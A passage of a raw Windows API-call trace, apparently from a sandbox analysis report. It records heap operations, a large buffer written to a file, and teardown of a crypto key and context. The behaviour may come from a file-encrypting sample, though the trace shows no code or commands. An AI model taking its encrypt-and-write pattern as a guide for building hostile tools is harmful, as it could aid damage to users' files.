lpMem=0x2e7f558 | out: hHeap=0x970000) returned 1 [0235.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0235.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f698 | out: hHeap=0x970000) returned 1 [0235.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0235.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f350 | out: hHeap=0x970000) returned 1 [0235.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0235.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f530 | out: hHeap=0x970000) returned 1 [0235.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0235.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f4e0 | out: hHeap=0x970000) returned 1 [0235.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0235.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0235.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0235.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f760 | out: hHeap=0x970000) returned 1 [0235.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80330 | out: hHeap=0x970000) returned 1 [0235.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0235.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0235.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0235.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0235.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f800 | out: hHeap=0x970000) returned 1 [0235.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ebe448 | out: hHeap=0x970000) returned 1 [0235.349] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0235.349] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0235.349] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0235.349] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0235.349] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f828 | out: hHeap=0x970000) returned 1 [0235.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0235.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0235.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0235.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0235.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0235.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0235.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14818 | out: hHeap=0x970000) returned 1 [0235.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0235.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0235.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0235.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0235.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0235.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0235.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0235.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f29320 | out: hHeap=0x970000) returned 1 [0235.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0235.352] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0235.352] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14b00) returned 0x2ee7a58 [0235.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ed2f50 | out: hHeap=0x970000) returned 1 [0235.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0235.355] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0235.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0235.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0235.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0235.355] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0235.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0235.355] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0235.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0235.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0235.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0235.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0235.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0235.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0235.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0235.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14b00) returned 0x2f14818 [0235.357] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0235.357] WriteFile (in: hFile=0x2a0, lpBuffer=0x2f14818*, nNumberOfBytesToWrite=0x14b00, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2f14818*, lpNumberOfBytesWritten=0x8cf5e4*=0x14b00, lpOverlapped=0x0) returned 1 [0235.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0235.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14818 | out: hHeap=0x970000) returned 1 [0235.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0235.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0235.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0235.360] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0235.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0235.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0235.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0235.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0235.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0235.360] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0235.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0235.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0235.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0235.361] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0235.361] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0235.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0235.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0235.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0235.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0235.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0235.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f670 [0235.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0235.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0235.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0235.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0235.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0235.376] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0235.376] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0235.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0235.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0235.377] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0235.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0235.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0235.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0235.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0235.377] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0235.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0235.377] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e51178, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0235.377] CryptDestroyKey (hKey=0xa872d0) returned 1 [0235.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0235.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0235.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0235.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0235.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0235.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0235.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0235.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0235.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0235.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0235.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0235.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0235.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0235.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0235.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0235.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0235.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0235.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0235.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0235.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0235.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0235.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0235.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0235.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0235.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0235.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0235.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0235.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0235.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0235.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f698 | out: hHeap=0x970000) returned 1 [0235.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0235.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0235.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0235.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0235.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0235.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0235.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0235.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0235.379] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0235.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0235.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0235.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0235.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0235.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0235.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f800 [0235.379] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0235.379] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0235.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f788 | out: hHeap=0x970000) returned 1 [0235.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0235.379] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0235.379] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0235.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04620 | out: hHeap=0x970000) returned 1 [0235.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0235.379] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0235.379] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0235.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0235.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0235.379] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0235.380] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0235.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f041c0 | out: hHeap=0x970000) returned 1 [0235.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0235.380] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0235.380] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0235.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0235.380] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0235.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0235.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0235.380] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0235.380] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0235.380] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0235.380] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0235.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3f0 | out: hHeap=0x970000) returned 1 [0235.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0235.380] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0235.435] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0235.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f043b8 | out: hHeap=0x970000) returned 1 [0235.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0235.435] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0235.436] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0235.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0235.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0235.436] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0235.436] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0235.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04118 | out: hHeap=0x970000) returned 1 [0235.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0235.436] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0235.436] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0235.436] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0235.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f043b8 | out: hHeap=0x970000) returned 1 [0235.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0235.436] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0235.436] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0235.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3f0 | out: hHeap=0x970000) returned 1 [0235.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0235.436] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0235.436] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0235.437] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0235.437] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e69a28, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0235.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0235.437] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0235.437] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0235.437] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0235.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04700 | out: hHeap=0x970000) returned 1 [0235.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0235.437] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0235.437] FreeLibrary (hLibModule=0x756e0000) returned 1 [0235.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0235.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0235.438] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0235.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0235.438] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) 